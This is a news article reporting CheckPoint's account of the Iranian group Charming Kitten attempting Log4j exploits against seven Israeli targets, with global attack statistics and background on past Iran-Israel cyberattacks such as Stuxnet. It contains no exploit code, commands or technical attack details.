A known Iranian hacking group commonly associated with the regime, named “Charming Kitten” or APT 35, was behind an attempt to exploit the Log4j vulnerability against seven targets in Israel from the government and business sector, the CheckPoint cyber security firm reported Wednesday.
CheckPoint “blocked these attacks, as we witnessed communications between a server used by this group and the targets in Israel,” it stated.
“The scope of this attack was between 6 am-4 pm [on Wednesday]. There’s no evidence for the group’s related activity on targets outside of Israel,” the company clarified.
Charming Kitten is an Iranian government cyber warfare group and was designated by FireEye cybersecurity company as “a nation state-based advanced persistent threat, regardless of the lack of its sophistication.”
CheckPoint’s reports of the last 48 hours “prove that both criminal hacking groups and nation-state actors are engaged in the exploration of this vulnerability, and we should all assume more such actors’ operations are to be revealed in the coming days.”
The Apache Log4j vulnerability threatens popular consumer and enterprise apps, cloud services, and websites that use the popular open-source logging library, Apache Log4j. This vulnerability is a Remote Code Execution (RCE) vulnerability with a critical CVSS score of 10 out of 10 from Apache.
Since Friday, when the vulnerability was reported, actors around the world have been on the lookout for exploits.
CheckPoint says that the outbreak of attacks is “clearly a cyber pandemic that hasn’t seen its peak yet.”
Early reports showed thousands of attack attempts, rising to over 40,000 during Saturday. Twenty-four hours after the initial outbreak CheckPoint’s sensors recorded almost 200,000 attempts of attack across the globe, leveraging this vulnerability. 72 hours post initial outbreak, the number hit over 800,000 attacks.
“It is clearly one of the most serious vulnerabilities on the internet in recent years, and the potential for damage is incalculable,” CheckPoint warned.
Iran and Israel have been engaged in cyber warfare in recent years, with Iran attacking a broad array of targets, and Israel focusing on Iran’s nuclear program.
Israel has also reportedly carried out several successful cyberattacks against critical Iranian infrastructure.
Most recently in October, a massive cyberattack hit Iran’s gas stations network, disabling about 4,000 gas stations across the country for about two days. Iran blamed Israel for the attack.
The Washington Post reported in May 2020 that Israel was behind the May 9 cyber-attack on Iran’s Shahid Rajaee port in Bandar Abbas, the largest in the country, which brought the shipping traffic to an abrupt and inexplicable halt for days, generating backups for miles.
The report quoted experts who said the attack was Israel’s retaliation for the April 24 Iranian attempt to penetrate Israeli computers that control water flow and wastewater treatment, as well as a system that regulates the addition of chlorine and other chemicals. The attack was detected and thwarted by the Israeli defenses.
Iran’s nuclear weapons project was severely damaged by the 2010 Stuxnet cyber-attack on Iran’s nuclear centrifuges, attributed to Israel and the US.